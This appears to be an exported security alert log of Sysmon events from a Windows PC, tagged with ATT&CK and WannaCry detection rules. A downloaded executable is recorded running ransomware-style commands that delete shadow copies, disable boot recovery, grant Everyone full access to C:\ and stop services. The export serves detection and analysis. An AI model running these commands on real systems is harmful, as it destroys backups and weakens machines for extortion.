DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:44.611"",""processGuid"":""{df9fc3d3-d170-5ec7-0000-0010b1951c00}"",""processId"":""4060"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:37:53.000",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:44.288 +ProcessGuid: {df9fc3d3-d170-5ec7-0000-001030831c00} +ProcessId: 6592 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:44.362993400Z"",""eventRecordID"":""1057"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:44.288\r\nProcessGuid: {df9fc3d3-d170-5ec7-0000-001030831c00}\r\nProcessId: 6592\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:44.288"",""processGuid"":""{df9fc3d3-d170-5ec7-0000-001030831c00}"",""processId"":""6592"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:37:52.929",15,"ATT&CK: WannaCry Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:44.143 +ProcessGuid: {df9fc3d3-d170-5ec7-0000-001008771c00} +ProcessId: 4544 +Image: C:\Windows\System32\bcdedit.exe +FileVersion: 10.0.18362.295 (WinBuild.160101.0800) +Description: Boot Configuration Data Editor +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: bcdedit.exe +CommandLine: bcdedit /set {default} recoveryenabled No & bcdedit /set {default} +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","bcdedit /set {default} recoveryenabled No & bcdedit /set {default}","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:44.187554900Z"",""eventRecordID"":""1055"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:44.143\r\nProcessGuid: {df9fc3d3-d170-5ec7-0000-001008771c00}\r\nProcessId: 4544\r\nImage: C:\\Windows\\System32\\bcdedit.exe\r\nFileVersion: 10.0.18362.295 (WinBuild.160101.0800)\r\nDescription: Boot Configuration Data Editor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: bcdedit.exe\r\nCommandLine: bcdedit /set {default} recoveryenabled No & bcdedit /set {default}\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:44.143"",""processGuid"":""{df9fc3d3-d170-5ec7-0000-001008771c00}"",""processId"":""4544"",""image"":""C:\\\\Windows\\\\System32\\\\bcdedit.exe"",""fileVersion"":""10.0.18362.295 (WinBuild.160101.0800)"",""description"":""Boot Configuration Data Editor"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""bcdedit.exe"",""commandLine"":""bcdedit /set {default} recoveryenabled No & bcdedit /set {default}"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:37:52.919",15,"ATT&CK T1070 T1490: Shadow Copies Deletion Using Operating Systems Utilities","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:44.131 +ProcessGuid: {df9fc3d3-d170-5ec7-0000-001024761c00} +ProcessId: 4564 +Image: C:\Windows\System32\vssadmin.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Command Line Interface for Microsoft® Volume Shadow Copy Service +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: VSSADMIN.EXE +CommandLine: vssadmin.exe Delete Shadows /all /quiet +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","vssadmin.exe Delete Shadows /all /quiet","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:44.181938900Z"",""eventRecordID"":""1054"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:44.131\r\nProcessGuid: {df9fc3d3-d170-5ec7-0000-001024761c00}\r\nProcessId: 4564\r\nImage: C:\\Windows\\System32\\vssadmin.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Command Line Interface for Microsoft® Volume Shadow Copy Service \r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: VSSADMIN.EXE\r\nCommandLine: vssadmin.exe Delete Shadows /all /quiet\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:44.131"",""processGuid"":""{df9fc3d3-d170-5ec7-0000-001024761c00}"",""processId"":""4564"",""image"":""C:\\\\Windows\\\\System32\\\\vssadmin.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Command Line Interface for Microsoft® Volume Shadow Copy Service"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""VSSADMIN.EXE"",""commandLine"":""vssadmin.exe Delete Shadows /all /quiet"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:37:52.881",15,"ATT&CK: WannaCry Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:44.121 +ProcessGuid: {df9fc3d3-d170-5ec7-0000-00105b751c00} +ProcessId: 1676 +Image: C:\Windows\System32\icacls.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: iCACLS.EXE +CommandLine: icacls ""C:\*"" /grant Everyone:F /T /C /Q +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","icacls \""C:\\*\"" /grant Everyone:F /T /C /Q","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:44.126885300Z"",""eventRecordID"":""1052"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:44.121\r\nProcessGuid: {df9fc3d3-d170-5ec7-0000-00105b751c00}\r\nProcessId: 1676\r\nImage: C:\\Windows\\System32\\icacls.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: \r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: iCACLS.EXE\r\nCommandLine: icacls \""C:\\*\"" /grant Everyone:F /T /C /Q\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:44.121"",""processGuid"":""{df9fc3d3-d170-5ec7-0000-00105b751c00}"",""processId"":""1676"",""image"":""C:\\\\Windows\\\\System32\\\\icacls.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""iCACLS.EXE"",""commandLine"":""icacls \\\""C:\\\\*\\\"" /grant Everyone:F /T /C /Q"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:37:51.390",9,"Windows Application error event","""Faulting application name: svchost.exe, version: 10.0.18362.1, time stamp: 0x32d6c210 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x18c4 +Faulting application start time: 0x01d6303b69281ee2 +Faulting application path: C:\Windows\system32\svchost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: d644ccdd-df0b-492b-ba8c-f6607f35bff2 +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:37:47.034",9,"Windows Application error event","""Faulting application name: GameBar.exe, version: 3.38.2002.25003, time stamp: 0x5e5615f2 +Faulting module name: GameBar.exe, version: 3.38.2002.25003, time stamp: 0x5e5615f2 +Exception code: 0xc0000005 +Fault offset: 0x00000000001c3cae +Faulting process id: 0x12dc +Faulting application start time: 0x01d6303b68ab1444 +Faulting application path: C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe\GameBar.exe +Faulting module path: C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe\GameBar.exe +Report Id: 1d222741-e6e1-4216-8237-f3bd684e9c4f +Faulting package full name: Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe +Faulting package-relative application ID: App""",, +"May 23, 2020 @ 12:37:46.831",12,"Sysmon - Suspicious Process - explorer.exe","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:38.100 +ProcessGuid: {df9fc3d3-d16a-5ec7-0000-0010c7e11a00} +ProcessId: 1592 +Image: C:\Windows\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: explorer.exe /LOADSAVEDWINDOWS +CurrentDirectory: C:\Windows\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452 +ParentProcessGuid: {df9fc3d3-d169-5ec7-0000-0010deb21a00} +ParentProcessId: 1140 +ParentImage: C:\Windows\System32\sihost.exe +ParentCommandLine: sihost.exe""","explorer.exe /LOADSAVEDWINDOWS","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:38.106013600Z"",""eventRecordID"":""1004"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:38.100\r\nProcessGuid: {df9fc3d3-d16a-5ec7-0000-0010c7e11a00}\r\nProcessId: 1592\r\nImage: C:\\Windows\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: explorer.exe /LOADSAVEDWINDOWS\r\nCurrentDirectory: C:\\Windows\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452\r\nParentProcessGuid: {df9fc3d3-d169-5ec7-0000-0010deb21a00}\r\nParentProcessId: 1140\r\nParentImage: C:\\Windows\\System32\\sihost.exe\r\nParentCommandLine: sihost.exe\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:38.100"",""processGuid"":""{df9fc3d3-d16a-5ec7-0000-0010c7e11a00}"",""processId"":""1592"",""image"":""C:\\\\Windows\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""explorer.exe /LOADSAVEDWINDOWS"",""currentDirectory"":""C:\\\\Windows\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452"",""parentProcessGuid"":""{df9fc3d3-d169-5ec7-0000-0010deb21a00}"",""parentProcessId"":""1140"",""parentImage"":""C:\\\\Windows\\\\System32\\\\sihost.exe"",""parentCommandLine"":""sihost.exe""}}}" +"May 23, 2020 @ 12:37:42.831",9,"Windows Application error event","""Faulting application name: OneDrive.exe, version: 20.52.311.11, time stamp: 0x95f7bd77 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x832e7bce +Exception code: 0xc0000409 +Fault offset: 0x00088d30 +Faulting process id: 0x179c +Faulting application start time: 0x01d6303b638bb436 +Faulting application path: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\OneDrive.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: d5d04867-127f-462f-a945-7fbd33b3f724 +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:37:42.129",9,"Windows Application error event","""Faulting application name: jusched.exe, version: 2.8.241.7, time stamp: 0x5df0d8be +Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 +Exception code: 0xc0000005 +Fault offset: 0x5b594484 +Faulting process id: 0x1760 +Faulting application start time: 0x01d6303b5fcacf9a +Faulting application path: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe +Faulting module path: unknown +Report Id: 141e9797-87a5-42c1-b4cf-f8e9ab81c404 +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:37:41.137",9,"Windows Application error event","""Faulting application name: StartMenuExperienceHost.exe, version: 0.0.0.0, time stamp: 0x5d65fb6a +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x1028 +Faulting application start time: 0x01d6303b502d106f +Faulting application path: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 4ea2aed0-dfa4-4504-92f5-5d0618a30e83 +Faulting package full name: Microsoft.Windows.StartMenuExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy +Faulting package-relative application ID: App""",, +"May 23, 2020 @ 12:37:41.063",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:32.818 +ProcessGuid: {df9fc3d3-d164-5ec7-0000-001038241a00} +ProcessId: 6444 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d164-5ec7-0000-0010551e1a00} +ParentProcessId: 6356 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:32.823233000Z"",""eventRecordID"":""976"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:32.818\r\nProcessGuid: {df9fc3d3-d164-5ec7-0000-001038241a00}\r\nProcessId: 6444\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: 